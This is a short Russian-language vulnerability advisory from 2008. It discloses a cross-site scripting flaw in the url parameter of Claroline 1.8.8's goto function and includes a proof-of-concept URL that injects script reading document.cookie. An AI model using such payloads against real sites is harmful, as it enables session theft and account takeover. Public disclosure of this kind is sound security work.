Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19488
HistoryMar 24, 2008 - 12:00 a.m.

Vulnerability in Claroline

2008-03-2400:00:00
vulners.com
10

Здравствуйте 3APA3A!

Сообщаю вам о найденной мною Cross-Site Scripting уязвимости в Claroline.

Уязвимость в функции goto в параметре url.

XSS:

http://site/claroline/document/goto/?url=%3Cimg%20src=''%20onerror=%22javascript:alert(document.cookie)%22%3E

Уязвима версия Claroline 1.8.8 и предыдущие версии.

Дополнительная информация о данной уязвимости у меня на сайте:
http://websecurity.com.ua/1712/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua